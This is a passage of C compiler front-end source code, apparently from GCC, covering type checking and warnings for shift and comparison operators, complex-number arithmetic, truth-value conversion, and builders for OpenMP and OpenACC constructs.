&& (op0 == truthvalue_true_node
|| TREE_CODE (orig_op1) == INTEGER_CST));
int_const = (int_const_or_overflow
&& !TREE_OVERFLOW (orig_op0)
&& (op0 == truthvalue_true_node
|| !TREE_OVERFLOW (orig_op1)));
}
break;
/* Shift operations: result has same type as first operand;
always convert second operand to int.
Also set SHORT_SHIFT if shifting rightward. */
case RSHIFT_EXPR:
if (gnu_vector_type_p (type0)
&& gnu_vector_type_p (type1)
&& TREE_CODE (TREE_TYPE (type0)) == INTEGER_TYPE
&& TREE_CODE (TREE_TYPE (type1)) == INTEGER_TYPE
&& known_eq (TYPE_VECTOR_SUBPARTS (type0),
TYPE_VECTOR_SUBPARTS (type1)))
{
result_type = type0;
converted = 1;
}
else if ((code0 == INTEGER_TYPE || code0 == FIXED_POINT_TYPE
|| (gnu_vector_type_p (type0)
&& TREE_CODE (TREE_TYPE (type0)) == INTEGER_TYPE))
&& code1 == INTEGER_TYPE)
{
doing_shift = true;
if (TREE_CODE (op1) == INTEGER_CST)
{
if (tree_int_cst_sgn (op1) < 0)
{
int_const = false;
if (c_inhibit_evaluation_warnings == 0)
warning_at (location, OPT_Wshift_count_negative,
"right shift count is negative");
}
else if (code0 == VECTOR_TYPE)
{
if (compare_tree_int (op1,
TYPE_PRECISION (TREE_TYPE (type0)))
>= 0)
{
int_const = false;
if (c_inhibit_evaluation_warnings == 0)
warning_at (location, OPT_Wshift_count_overflow,
"right shift count >= width of vector element");
}
}
else
{
if (!integer_zerop (op1))
short_shift = 1;
if (compare_tree_int (op1, TYPE_PRECISION (type0)) >= 0)
{
int_const = false;
if (c_inhibit_evaluation_warnings == 0)
warning_at (location, OPT_Wshift_count_overflow,
"right shift count >= width of type");
}
}
}
/* Use the type of the value to be shifted. */
result_type = type0;
/* Avoid converting op1 to result_type later. */
converted = 1;
}
break;
case LSHIFT_EXPR:
if (gnu_vector_type_p (type0)
&& gnu_vector_type_p (type1)
&& TREE_CODE (TREE_TYPE (type0)) == INTEGER_TYPE
&& TREE_CODE (TREE_TYPE (type1)) == INTEGER_TYPE
&& known_eq (TYPE_VECTOR_SUBPARTS (type0),
TYPE_VECTOR_SUBPARTS (type1)))
{
result_type = type0;
converted = 1;
}
else if ((code0 == INTEGER_TYPE || code0 == FIXED_POINT_TYPE
|| (gnu_vector_type_p (type0)
&& TREE_CODE (TREE_TYPE (type0)) == INTEGER_TYPE))
&& code1 == INTEGER_TYPE)
{
doing_shift = true;
if (TREE_CODE (op0) == INTEGER_CST
&& tree_int_cst_sgn (op0) < 0)
{
/* Don't reject a left shift of a negative value in a context
where a constant expression is needed in C90. */
if (flag_isoc99)
int_const = false;
if (c_inhibit_evaluation_warnings == 0)
warning_at (location, OPT_Wshift_negative_value,
"left shift of negative value");
}
if (TREE_CODE (op1) == INTEGER_CST)
{
if (tree_int_cst_sgn (op1) < 0)
{
int_const = false;
if (c_inhibit_evaluation_warnings == 0)
warning_at (location, OPT_Wshift_count_negative,
"left shift count is negative");
}
else if (code0 == VECTOR_TYPE)
{
if (compare_tree_int (op1,
TYPE_PRECISION (TREE_TYPE (type0)))
>= 0)
{
int_const = false;
if (c_inhibit_evaluation_warnings == 0)
warning_at (location, OPT_Wshift_count_overflow,
"left shift count >= width of vector element");
}
}
else if (compare_tree_int (op1, TYPE_PRECISION (type0)) >= 0)
{
int_const = false;
if (c_inhibit_evaluation_warnings == 0)
warning_at (location, OPT_Wshift_count_overflow,
"left shift count >= width of type");
}
else if (TREE_CODE (op0) == INTEGER_CST
&& maybe_warn_shift_overflow (location, op0, op1)
&& flag_isoc99)
int_const = false;
}
/* Use the type of the value to be shifted. */
result_type = type0;
/* Avoid converting op1 to result_type later. */
converted = 1;
}
break;
case EQ_EXPR:
case NE_EXPR:
if (gnu_vector_type_p (type0) && gnu_vector_type_p (type1))
{
tree intt;
if (!vector_types_compatible_elements_p (type0, type1))
{
error_at (location, "comparing vectors with different "
"element types");
return error_mark_node;
}
if (maybe_ne (TYPE_VECTOR_SUBPARTS (type0),
TYPE_VECTOR_SUBPARTS (type1)))
{
error_at (location, "comparing vectors with different "
"number of elements");
return error_mark_node;
}
/* It's not precisely specified how the usual arithmetic
conversions apply to the vector types. Here, we use
the unsigned type if one of the operands is signed and
the other one is unsigned. */
if (TYPE_UNSIGNED (type0) != TYPE_UNSIGNED (type1))
{
if (!TYPE_UNSIGNED (type0))
op0 = build1 (VIEW_CONVERT_EXPR, type1, op0);
else
op1 = build1 (VIEW_CONVERT_EXPR, type0, op1);
warning_at (location, OPT_Wsign_compare, "comparison between "
"types %qT and %qT", type0, type1);
}
/* Always construct signed integer vector type. */
intt = c_common_type_for_size (GET_MODE_BITSIZE
(SCALAR_TYPE_MODE
(TREE_TYPE (type0))), 0);
if (!intt)
{
error_at (location, "could not find an integer type "
"of the same size as %qT",
TREE_TYPE (type0));
return error_mark_node;
}
result_type = build_opaque_vector_type (intt,
TYPE_VECTOR_SUBPARTS (type0));
converted = 1;
ret = build_vec_cmp (resultcode, result_type, op0, op1);
goto return_build_binary_op;
}
if (FLOAT_TYPE_P (type0) || FLOAT_TYPE_P (type1))
warning_at (location,
OPT_Wfloat_equal,
"comparing floating-point with %<==%> or %<!=%> is unsafe");
/* Result of comparison is always int,
but don't convert the args to int! */
build_type = integer_type_node;
if ((code0 == INTEGER_TYPE || code0 == REAL_TYPE
|| code0 == FIXED_POINT_TYPE || code0 == COMPLEX_TYPE)
&& (code1 == INTEGER_TYPE || code1 == REAL_TYPE
|| code1 == FIXED_POINT_TYPE || code1 == COMPLEX_TYPE))
short_compare = 1;
else if (code0 == POINTER_TYPE && null_pointer_constant_p (orig_op1))
{
if (TREE_CODE (op0) == ADDR_EXPR
&& decl_with_nonnull_addr_p (TREE_OPERAND (op0, 0))
&& !from_macro_expansion_at (location))
{
if (code == EQ_EXPR)
warning_at (location,
OPT_Waddress,
"the comparison will always evaluate as %<false%> "
"for the address of %qD will never be NULL",
TREE_OPERAND (op0, 0));
else
warning_at (location,
OPT_Waddress,
"the comparison will always evaluate as %<true%> "
"for the address of %qD will never be NULL",
TREE_OPERAND (op0, 0));
}
result_type = type0;
}
else if (code1 == POINTER_TYPE && null_pointer_constant_p (orig_op0))
{
if (TREE_CODE (op1) == ADDR_EXPR
&& decl_with_nonnull_addr_p (TREE_OPERAND (op1, 0))
&& !from_macro_expansion_at (location))
{
if (code == EQ_EXPR)
warning_at (location,
OPT_Waddress,
"the comparison will always evaluate as %<false%> "
"for the address of %qD will never be NULL",
TREE_OPERAND (op1, 0));
else
warning_at (location,
OPT_Waddress,
"the comparison will always evaluate as %<true%> "
"for the address of %qD will never be NULL",
TREE_OPERAND (op1, 0));
}
result_type = type1;
}
else if (code0 == POINTER_TYPE && code1 == POINTER_TYPE)
{
tree tt0 = TREE_TYPE (type0);
tree tt1 = TREE_TYPE (type1);
addr_space_t as0 = TYPE_ADDR_SPACE (tt0);
addr_space_t as1 = TYPE_ADDR_SPACE (tt1);
addr_space_t as_common = ADDR_SPACE_GENERIC;
/* Anything compares with void *. void * compares with anything.
Otherwise, the targets must be compatible
and both must be object or both incomplete. */
if (comp_target_types (location, type0, type1))
result_type = common_pointer_type (type0, type1);
else if (!addr_space_superset (as0, as1, &as_common))
{
error_at (location, "comparison of pointers to "
"disjoint address spaces");
return error_mark_node;
}
else if (VOID_TYPE_P (tt0) && !TYPE_ATOMIC (tt0))
{
if (pedantic && TREE_CODE (tt1) == FUNCTION_TYPE)
pedwarn (location, OPT_Wpedantic, "ISO C forbids "
"comparison of %<void *%> with function pointer");
}
else if (VOID_TYPE_P (tt1) && !TYPE_ATOMIC (tt1))
{
if (pedantic && TREE_CODE (tt0) == FUNCTION_TYPE)
pedwarn (location, OPT_Wpedantic, "ISO C forbids "
"comparison of %<void *%> with function pointer");
}
else
/* Avoid warning about the volatile ObjC EH puts on decls. */
if (!objc_ok)
pedwarn (location, 0,
"comparison of distinct pointer types lacks a cast");
if (result_type == NULL_TREE)
{
int qual = ENCODE_QUAL_ADDR_SPACE (as_common);
result_type = build_pointer_type
(build_qualified_type (void_type_node, qual));
}
}
else if (code0 == POINTER_TYPE && code1 == INTEGER_TYPE)
{
result_type = type0;
pedwarn (location, 0, "comparison between pointer and integer");
}
else if (code0 == INTEGER_TYPE && code1 == POINTER_TYPE)
{
result_type = type1;
pedwarn (location, 0, "comparison between pointer and integer");
}
if ((TREE_CODE (TREE_TYPE (orig_op0)) == BOOLEAN_TYPE
|| truth_value_p (TREE_CODE (orig_op0)))
^ (TREE_CODE (TREE_TYPE (orig_op1)) == BOOLEAN_TYPE
|| truth_value_p (TREE_CODE (orig_op1))))
maybe_warn_bool_compare (location, code, orig_op0, orig_op1);
break;
case LE_EXPR:
case GE_EXPR:
case LT_EXPR:
case GT_EXPR:
if (gnu_vector_type_p (type0) && gnu_vector_type_p (type1))
{
tree intt;
if (!vector_types_compatible_elements_p (type0, type1))
{
error_at (location, "comparing vectors with different "
"element types");
return error_mark_node;
}
if (maybe_ne (TYPE_VECTOR_SUBPARTS (type0),
TYPE_VECTOR_SUBPARTS (type1)))
{
error_at (location, "comparing vectors with different "
"number of elements");
return error_mark_node;
}
/* It's not precisely specified how the usual arithmetic
conversions apply to the vector types. Here, we use
the unsigned type if one of the operands is signed and
the other one is unsigned. */
if (TYPE_UNSIGNED (type0) != TYPE_UNSIGNED (type1))
{
if (!TYPE_UNSIGNED (type0))
op0 = build1 (VIEW_CONVERT_EXPR, type1, op0);
else
op1 = build1 (VIEW_CONVERT_EXPR, type0, op1);
warning_at (location, OPT_Wsign_compare, "comparison between "
"types %qT and %qT", type0, type1);
}
/* Always construct signed integer vector type. */
intt = c_common_type_for_size (GET_MODE_BITSIZE
(SCALAR_TYPE_MODE
(TREE_TYPE (type0))), 0);
if (!intt)
{
error_at (location, "could not find an integer type "
"of the same size as %qT",
TREE_TYPE (type0));
return error_mark_node;
}
result_type = build_opaque_vector_type (intt,
TYPE_VECTOR_SUBPARTS (type0));
converted = 1;
ret = build_vec_cmp (resultcode, result_type, op0, op1);
goto return_build_binary_op;
}
build_type = integer_type_node;
if ((code0 == INTEGER_TYPE || code0 == REAL_TYPE
|| code0 == FIXED_POINT_TYPE)
&& (code1 == INTEGER_TYPE || code1 == REAL_TYPE
|| code1 == FIXED_POINT_TYPE))
short_compare = 1;
else if (code0 == POINTER_TYPE && code1 == POINTER_TYPE)
{
addr_space_t as0 = TYPE_ADDR_SPACE (TREE_TYPE (type0));
addr_space_t as1 = TYPE_ADDR_SPACE (TREE_TYPE (type1));
addr_space_t as_common;
if (comp_target_types (location, type0, type1))
{
result_type = common_pointer_type (type0, type1);
if (!COMPLETE_TYPE_P (TREE_TYPE (type0))
!= !COMPLETE_TYPE_P (TREE_TYPE (type1)))
pedwarn (location, 0,
"comparison of complete and incomplete pointers");
else if (TREE_CODE (TREE_TYPE (type0)) == FUNCTION_TYPE)
pedwarn (location, OPT_Wpedantic, "ISO C forbids "
"ordered comparisons of pointers to functions");
else if (null_pointer_constant_p (orig_op0)
|| null_pointer_constant_p (orig_op1))
warning_at (location, OPT_Wextra,
"ordered comparison of pointer with null pointer");
}
else if (!addr_space_superset (as0, as1, &as_common))
{
error_at (location, "comparison of pointers to "
"disjoint address spaces");
return error_mark_node;
}
else
{
int qual = ENCODE_QUAL_ADDR_SPACE (as_common);
result_type = build_pointer_type
(build_qualified_type (void_type_node, qual));
pedwarn (location, 0,
"comparison of distinct pointer types lacks a cast");
}
}
else if (code0 == POINTER_TYPE && null_pointer_constant_p (orig_op1))
{
result_type = type0;
if (pedantic)
pedwarn (location, OPT_Wpedantic,
"ordered comparison of pointer with integer zero");
else if (extra_warnings)
warning_at (location, OPT_Wextra,
"ordered comparison of pointer with integer zero");
}
else if (code1 == POINTER_TYPE && null_pointer_constant_p (orig_op0))
{
result_type = type1;
if (pedantic)
pedwarn (location, OPT_Wpedantic,
"ordered comparison of pointer with integer zero");
else if (extra_warnings)
warning_at (location, OPT_Wextra,
"ordered comparison of pointer with integer zero");
}
else if (code0 == POINTER_TYPE && code1 == INTEGER_TYPE)
{
result_type = type0;
pedwarn (location, 0, "comparison between pointer and integer");
}
else if (code0 == INTEGER_TYPE && code1 == POINTER_TYPE)
{
result_type = type1;
pedwarn (location, 0, "comparison between pointer and integer");
}
if ((code0 == POINTER_TYPE || code1 == POINTER_TYPE)
&& sanitize_flags_p (SANITIZE_POINTER_COMPARE))
{
op0 = save_expr (op0);
op1 = save_expr (op1);
tree tt = builtin_decl_explicit (BUILT_IN_ASAN_POINTER_COMPARE);
instrument_expr = build_call_expr_loc (location, tt, 2, op0, op1);
}
if ((TREE_CODE (TREE_TYPE (orig_op0)) == BOOLEAN_TYPE
|| truth_value_p (TREE_CODE (orig_op0)))
^ (TREE_CODE (TREE_TYPE (orig_op1)) == BOOLEAN_TYPE
|| truth_value_p (TREE_CODE (orig_op1))))
maybe_warn_bool_compare (location, code, orig_op0, orig_op1);
break;
default:
gcc_unreachable ();
}
if (code0 == ERROR_MARK || code1 == ERROR_MARK)
return error_mark_node;
if (gnu_vector_type_p (type0)
&& gnu_vector_type_p (type1)
&& (!tree_int_cst_equal (TYPE_SIZE (type0), TYPE_SIZE (type1))
|| !vector_types_compatible_elements_p (type0, type1)))
{
gcc_rich_location richloc (location);
maybe_range_label_for_tree_type_mismatch
label_for_op0 (orig_op0, orig_op1),
label_for_op1 (orig_op1, orig_op0);
richloc.maybe_add_expr (orig_op0, &label_for_op0);
richloc.maybe_add_expr (orig_op1, &label_for_op1);
binary_op_error (&richloc, code, type0, type1);
return error_mark_node;
}
if ((code0 == INTEGER_TYPE || code0 == REAL_TYPE || code0 == COMPLEX_TYPE
|| code0 == FIXED_POINT_TYPE
|| gnu_vector_type_p (type0))
&&
(code1 == INTEGER_TYPE || code1 == REAL_TYPE || code1 == COMPLEX_TYPE
|| code1 == FIXED_POINT_TYPE
|| gnu_vector_type_p (type1)))
{
bool first_complex = (code0 == COMPLEX_TYPE);
bool second_complex = (code1 == COMPLEX_TYPE);
int none_complex = (!first_complex && !second_complex);
if (shorten || common || short_compare)
{
result_type = c_common_type (type0, type1);
do_warn_double_promotion (result_type, type0, type1,
"implicit conversion from %qT to %qT "
"to match other operand of binary "
"expression",
location);
if (result_type == error_mark_node)
return error_mark_node;
}
if (first_complex != second_complex
&& (code == PLUS_EXPR
|| code == MINUS_EXPR
|| code == MULT_EXPR
|| (code == TRUNC_DIV_EXPR && first_complex))
&& TREE_CODE (TREE_TYPE (result_type)) == REAL_TYPE
&& flag_signed_zeros)
{
/* An operation on mixed real/complex operands must be
handled specially, but the language-independent code can
more easily optimize the plain complex arithmetic if
-fno-signed-zeros. */
tree real_type = TREE_TYPE (result_type);
tree real, imag;
if (type0 != orig_type0 || type1 != orig_type1)
{
gcc_assert (may_need_excess_precision && common);
semantic_result_type = c_common_type (orig_type0, orig_type1);
}
if (first_complex)
{
if (TREE_TYPE (op0) != result_type)
op0 = convert_and_check (location, result_type, op0);
if (TREE_TYPE (op1) != real_type)
op1 = convert_and_check (location, real_type, op1);
}
else
{
if (TREE_TYPE (op0) != real_type)
op0 = convert_and_check (location, real_type, op0);
if (TREE_TYPE (op1) != result_type)
op1 = convert_and_check (location, result_type, op1);
}
if (TREE_CODE (op0) == ERROR_MARK || TREE_CODE (op1) == ERROR_MARK)
return error_mark_node;
if (first_complex)
{
op0 = save_expr (op0);
real = build_unary_op (EXPR_LOCATION (orig_op0), REALPART_EXPR,
op0, true);
imag = build_unary_op (EXPR_LOCATION (orig_op0), IMAGPART_EXPR,
op0, true);
switch (code)
{
case MULT_EXPR:
case TRUNC_DIV_EXPR:
op1 = save_expr (op1);
imag = build2 (resultcode, real_type, imag, op1);
/* Fall through. */
case PLUS_EXPR:
case MINUS_EXPR:
real = build2 (resultcode, real_type, real, op1);
break;
default:
gcc_unreachable();
}
}
else
{
op1 = save_expr (op1);
real = build_unary_op (EXPR_LOCATION (orig_op1), REALPART_EXPR,
op1, true);
imag = build_unary_op (EXPR_LOCATION (orig_op1), IMAGPART_EXPR,
op1, true);
switch (code)
{
case MULT_EXPR:
op0 = save_expr (op0);
imag = build2 (resultcode, real_type, op0, imag);
/* Fall through. */
case PLUS_EXPR:
real = build2 (resultcode, real_type, op0, real);
break;
case MINUS_EXPR:
real = build2 (resultcode, real_type, op0, real);
imag = build1 (NEGATE_EXPR, real_type, imag);
break;
default:
gcc_unreachable();
}
}
ret = build2 (COMPLEX_EXPR, result_type, real, imag);
goto return_build_binary_op;
}
/* For certain operations (which identify themselves by shorten != 0)
if both args were extended from the same smaller type,
do the arithmetic in that type and then extend.
shorten !=0 and !=1 indicates a bitwise operation.
For them, this optimization is safe only if
both args are zero-extended or both are sign-extended.
Otherwise, we might change the result.
Eg, (short)-1 | (unsigned short)-1 is (int)-1
but calculated in (unsigned short) it would be (unsigned short)-1. */
if (shorten && none_complex)
{
final_type = result_type;
result_type = shorten_binary_op (result_type, op0, op1,
shorten == -1);
}
/* Shifts can be shortened if shifting right. */
if (short_shift)
{
int unsigned_arg;
tree arg0 = get_narrower (op0, &unsigned_arg);
final_type = result_type;
if (arg0 == op0 && final_type == TREE_TYPE (op0))
unsigned_arg = TYPE_UNSIGNED (TREE_TYPE (op0));
if (TYPE_PRECISION (TREE_TYPE (arg0)) < TYPE_PRECISION (result_type)
&& tree_int_cst_sgn (op1) > 0
/* We can shorten only if the shift count is less than the
number of bits in the smaller type size. */
&& compare_tree_int (op1, TYPE_PRECISION (TREE_TYPE (arg0))) < 0
/* We cannot drop an unsigned shift after sign-extension. */
&& (!TYPE_UNSIGNED (final_type) || unsigned_arg))
{
/* Do an unsigned shift if the operand was zero-extended. */
result_type
= c_common_signed_or_unsigned_type (unsigned_arg,
TREE_TYPE (arg0));
/* Convert value-to-be-shifted to that type. */
if (TREE_TYPE (op0) != result_type)
op0 = convert (result_type, op0);
converted = 1;
}
}
/* Comparison operations are shortened too but differently.
They identify themselves by setting short_compare = 1. */
if (short_compare)
{
/* Don't write &op0, etc., because that would prevent op0
from being kept in a register.
Instead, make copies of the our local variables and
pass the copies by reference, then copy them back afterward. */
tree xop0 = op0, xop1 = op1, xresult_type = result_type;
enum tree_code xresultcode = resultcode;
tree val
= shorten_compare (location, &xop0, &xop1, &xresult_type,
&xresultcode);
if (val != NULL_TREE)
{
ret = val;
goto return_build_binary_op;
}
op0 = xop0, op1 = xop1;
converted = 1;
resultcode = xresultcode;
if (c_inhibit_evaluation_warnings == 0)
{
bool op0_maybe_const = true;
bool op1_maybe_const = true;
tree orig_op0_folded, orig_op1_folded;
if (in_late_binary_op)
{
orig_op0_folded = orig_op0;
orig_op1_folded = orig_op1;
}
else
{
/* Fold for the sake of possible warnings, as in
build_conditional_expr. This requires the
"original" values to be folded, not just op0 and
op1. */
c_inhibit_evaluation_warnings++;
op0 = c_fully_fold (op0, require_constant_value,
&op0_maybe_const);
op1 = c_fully_fold (op1, require_constant_value,
&op1_maybe_const);
c_inhibit_evaluation_warnings--;
orig_op0_folded = c_fully_fold (orig_op0,
require_constant_value,
NULL);
orig_op1_folded = c_fully_fold (orig_op1,
require_constant_value,
NULL);
}
if (warn_sign_compare)
warn_for_sign_compare (location, orig_op0_folded,
orig_op1_folded, op0, op1,
result_type, resultcode);
if (!in_late_binary_op && !int_operands)
{
if (!op0_maybe_const || TREE_CODE (op0) != INTEGER_CST)
op0 = c_wrap_maybe_const (op0, !op0_maybe_const);
if (!op1_maybe_const || TREE_CODE (op1) != INTEGER_CST)
op1 = c_wrap_maybe_const (op1, !op1_maybe_const);
}
}
}
}
/* At this point, RESULT_TYPE must be nonzero to avoid an error message.
If CONVERTED is zero, both args will be converted to type RESULT_TYPE.
Then the expression will be built.
It will be given type FINAL_TYPE if that is nonzero;
otherwise, it will be given type RESULT_TYPE. */
if (!result_type)
{
/* Favor showing any expression locations that are available. */
op_location_t oploc (location, UNKNOWN_LOCATION);
binary_op_rich_location richloc (oploc, orig_op0, orig_op1, true);
binary_op_error (&richloc, code, TREE_TYPE (op0), TREE_TYPE (op1));
return error_mark_node;
}
if (build_type == NULL_TREE)
{
build_type = result_type;
if ((type0 != orig_type0 || type1 != orig_type1)
&& !boolean_op)
{
gcc_assert (may_need_excess_precision && common);
semantic_result_type = c_common_type (orig_type0, orig_type1);
}
}
if (!converted)
{
op0 = ep_convert_and_check (location, result_type, op0,
semantic_result_type);
op1 = ep_convert_and_check (location, result_type, op1,
semantic_result_type);
/* This can happen if one operand has a vector type, and the other
has a different type. */
if (TREE_CODE (op0) == ERROR_MARK || TREE_CODE (op1) == ERROR_MARK)
return error_mark_node;
}
if (sanitize_flags_p ((SANITIZE_SHIFT
| SANITIZE_DIVIDE | SANITIZE_FLOAT_DIVIDE))
&& current_function_decl != NULL_TREE
&& (doing_div_or_mod || doing_shift)
&& !require_constant_value)
{
/* OP0 and/or OP1 might have side-effects. */
op0 = save_expr (op0);
op1 = save_expr (op1);
op0 = c_fully_fold (op0, false, NULL);
op1 = c_fully_fold (op1, false, NULL);
if (doing_div_or_mod && (sanitize_flags_p ((SANITIZE_DIVIDE
| SANITIZE_FLOAT_DIVIDE))))
instrument_expr = ubsan_instrument_division (location, op0, op1);
else if (doing_shift && sanitize_flags_p (SANITIZE_SHIFT))
instrument_expr = ubsan_instrument_shift (location, code, op0, op1);
}
/* Treat expressions in initializers specially as they can't trap. */
if (int_const_or_overflow)
ret = (require_constant_value
? fold_build2_initializer_loc (location, resultcode, build_type,
op0, op1)
: fold_build2_loc (location, resultcode, build_type, op0, op1));
else
ret = build2 (resultcode, build_type, op0, op1);
if (final_type != NULL_TREE)
ret = convert (final_type, ret);
return_build_binary_op:
gcc_assert (ret != error_mark_node);
if (TREE_CODE (ret) == INTEGER_CST && !TREE_OVERFLOW (ret) && !int_const)
ret = (int_operands
? note_integer_operands (ret)
: build1 (NOP_EXPR, TREE_TYPE (ret), ret));
else if (TREE_CODE (ret) != INTEGER_CST && int_operands
&& !in_late_binary_op)
ret = note_integer_operands (ret);
protected_set_expr_location (ret, location);
if (instrument_expr != NULL)
ret = fold_build2 (COMPOUND_EXPR, TREE_TYPE (ret),
instrument_expr, ret);
if (semantic_result_type)
ret = build1_loc (location, EXCESS_PRECISION_EXPR,
semantic_result_type, ret);
return ret;
}
/* Convert EXPR to be a truth-value, validating its type for this
purpose. LOCATION is the source location for the expression. */
tree
c_objc_common_truthvalue_conversion (location_t location, tree expr)
{
bool int_const, int_operands;
switch (TREE_CODE (TREE_TYPE (expr)))
{
case ARRAY_TYPE:
error_at (location, "used array that cannot be converted to pointer where scalar is required");
return error_mark_node;
case RECORD_TYPE:
error_at (location, "used struct type value where scalar is required");
return error_mark_node;
case UNION_TYPE:
error_at (location, "used union type value where scalar is required");
return error_mark_node;
case VOID_TYPE:
error_at (location, "void value not ignored as it ought to be");
return error_mark_node;
case POINTER_TYPE:
if (reject_gcc_builtin (expr))
return error_mark_node;
break;
case FUNCTION_TYPE:
gcc_unreachable ();
case VECTOR_TYPE:
error_at (location, "used vector type where scalar is required");
return error_mark_node;
default:
break;
}
int_const = (TREE_CODE (expr) == INTEGER_CST && !TREE_OVERFLOW (expr));
int_operands = EXPR_INT_CONST_OPERANDS (expr);
if (int_operands && TREE_CODE (expr) != INTEGER_CST)
{
expr = remove_c_maybe_const_expr (expr);
expr = build2 (NE_EXPR, integer_type_node, expr,
convert (TREE_TYPE (expr), integer_zero_node));
expr = note_integer_operands (expr);
}
else
/* ??? Should we also give an error for vectors rather than leaving
those to give errors later? */
expr = c_common_truthvalue_conversion (location, expr);
if (TREE_CODE (expr) == INTEGER_CST && int_operands && !int_const)
{
if (TREE_OVERFLOW (expr))
return expr;
else
return note_integer_operands (expr);
}
if (TREE_CODE (expr) == INTEGER_CST && !int_const)
return build1 (NOP_EXPR, TREE_TYPE (expr), expr);
return expr;
}
/* Convert EXPR to a contained DECL, updating *TC, *TI and *SE as
required. */
tree
c_expr_to_decl (tree expr, bool *tc ATTRIBUTE_UNUSED, bool *se)
{
if (TREE_CODE (expr) == COMPOUND_LITERAL_EXPR)
{
tree decl = COMPOUND_LITERAL_EXPR_DECL (expr);
/* Executing a compound literal inside a function reinitializes
it. */
if (!TREE_STATIC (decl))
*se = true;
return decl;
}
else
return expr;
}
/* Generate OMP construct CODE, with BODY and CLAUSES as its compound
statement. LOC is the location of the construct. */
tree
c_finish_omp_construct (location_t loc, enum tree_code code, tree body,
tree clauses)
{
body = c_end_compound_stmt (loc, body, true);
tree stmt = make_node (code);
TREE_TYPE (stmt) = void_type_node;
OMP_BODY (stmt) = body;
OMP_CLAUSES (stmt) = clauses;
SET_EXPR_LOCATION (stmt, loc);
return add_stmt (stmt);
}
/* Generate OACC_DATA, with CLAUSES and BLOCK as its compound
statement. LOC is the location of the OACC_DATA. */
tree
c_finish_oacc_data (location_t loc, tree clauses, tree block)
{
tree stmt;
block = c_end_compound_stmt (loc, block, true);
stmt = make_node (OACC_DATA);
TREE_TYPE (stmt) = void_type_node;
OACC_DATA_CLAUSES (stmt) = clauses;
OACC_DATA_BODY (stmt) = block;
SET_EXPR_LOCATION (stmt, loc);
return add_stmt (stmt);
}
/* Generate OACC_HOST_DATA, with CLAUSES and BLOCK as its compound
statement. LOC is the location of the OACC_HOST_DATA. */
tree
c_finish_oacc_host_data (location_t loc, tree clauses, tree block)
{
tree stmt;
block = c_end_compound_stmt (loc, block, true);
stmt = make_node (OACC_HOST_DATA);
TREE_TYPE (stmt) = void_type_node;
OACC_HOST_DATA_CLAUSES (stmt) = clauses;
OACC_HOST_DATA_BODY (stmt) = block;
SET_EXPR_LOCATION (stmt, loc);
return add_stmt (stmt);
}
/* Like c_begin_compound_stmt, except force the retention of the BLOCK. */
tree
c_begin_omp_parallel (void)
{
tree block;
keep_next_level ();
block = c_begin_compound_stmt (true);
return block;
}
/* Generate OMP_PARALLEL, with CLAUSES and BLOCK as its compound
statement. LOC is the location of the OMP_PARALLEL. */
tree
c_finish_omp_parallel (location_t loc, tree clauses, tree block)
{
tree stmt;
block = c_end_compound_stmt (loc, block, true);
stmt = make_node (OMP_PARALLEL);
TREE_TYPE (stmt) = void_type_node;
OMP_PARALLEL_CLAUSES (stmt) = clauses;
OMP_PARALLEL_BODY (stmt) = block;
SET_EXPR_LOCATION (stmt, loc);
return add_stmt (stmt);
}
/* Like c_begin_compound_stmt, except force the retention of the BLOCK. */
tree
c_begin_omp_task (void)
{
tree block;
keep_next_level ();
block = c_begin_compound_stmt (true);
return block;
}
/* Generate OMP_TASK, with CLAUSES and BLOCK as its compound
statement. LOC is the location of the #pragma. */
tree
c_finish_omp_task (location_t loc, tree clauses, tree block)
{
tree stmt;
block = c_end_compound_stmt (loc, block, true);
stmt = make_node (OMP_TASK);
TREE_TYPE (stmt) = void_type_node;
OMP_TASK_CLAUSES (stmt) = clauses;
OMP_TASK_BODY (stmt) = block;
SET_EXPR_LOCATION (stmt, loc);
return add_stmt (stmt);
}
/* Generate GOMP_cancel call for #pragma omp cancel. */
void
c_finish_omp_cancel (location_t loc, tree clauses)
{
tree fn = builtin_decl_explicit (BUILT_IN_GOMP_CANCEL);
int mask = 0;
if (omp_find_clause (clauses, OMP_CLAUSE_PARALLEL))
mask = 1;
else if (omp_find_clause (clauses, OMP_CLAUSE_FOR))
mask = 2;
else if (omp_find_clause (clauses, OMP_CLAUSE_SECTIONS))
mask = 4;
else if (omp_find_clause (clauses, OMP_CLAUSE_TASKGROUP))
mask = 8;
else
{
error_at (loc, "%<#pragma omp cancel%> must specify one of "
"%<parallel%>, %<for%>, %<sections%> or %<taskgroup%> "
"clauses");
return;
}
tree ifc = omp_find_clause (clauses, OMP_CLAUSE_IF);
if (ifc != NULL_TREE)
{
if (OMP_CLAUSE_IF_MODIFIER (ifc) != ERROR_MARK
&& OMP_CLAUSE_IF_MODIFIER (ifc) != VOID_CST)
error_at (OMP_CLAUSE_LOCATION (ifc),
"expected %<cancel%> %<if%> clause modifier");
else
{
tree ifc2 = omp_find_clause (OMP_CLAUSE_CHAIN (ifc), OMP_CLAUSE_IF);
if (ifc2 != NULL_TREE)
{
gcc_assert (OMP_CLAUSE_IF_MODIFIER (ifc) == VOID_CST
&& OMP_CLAUSE_IF_MODIFIER (ifc2) != ERROR_MARK
&& OMP_CLAUSE_IF_MODIFIER (ifc2) != VOID_CST);
error_at (OMP_CLAUSE_LOCATION (ifc2),
"expected %<cancel%> %<if%> clause modifier");
}
}
tree type = TREE_TYPE (OMP_CLAUSE_IF_EXPR (ifc));
ifc = fold_build2_loc (OMP_CLAUSE_LOCATION (ifc), NE_EXPR,
boolean_type_node, OMP_CLAUSE_IF_EXPR (ifc),
build_zero_cst (type));
}
else
ifc = boolean_true_node;
tree stmt = build_call_expr_loc (loc, fn, 2,
build_int_cst (integer_type_node, mask),
ifc);
add_stmt (stmt);
}
/* Generate GOMP_cancellation_point call for
#pragma omp cancellation point. */
void
c_finish_omp_cancellation_point (location_t loc, tree clauses)
{
tree fn = builtin_decl_explicit (BUILT_IN_GOMP_CANCELLATION_POINT);
int mask = 0;
if (omp_find_clause (clauses, OMP_CLAUSE_PARALLEL))
mask = 1;
else if (omp_find_clause (clauses, OMP_CLAUSE_FOR))
mask = 2;
else if (omp_find_clause (clauses, OMP_CLAUSE_SECTIONS))
mask = 4;
else if (omp_find_clause (clauses, OMP_CLAUSE_TASKGROUP))
mask = 8;
else
{
error_at (loc, "%<#pragma omp cancellation point%> must specify one of "
"%<parallel%>, %<for%>, %<sections%> or %<taskgroup%> "
"clauses");
return;
}
tree stmt = build_call_expr_loc (loc, fn, 1,
build_int_cst (integer_type_node, mask));
add_stmt (stmt);
}
/* Helper function for handle_omp_array_sections. Called recursively
to handle multiple array-section-subscripts. C is the clause,
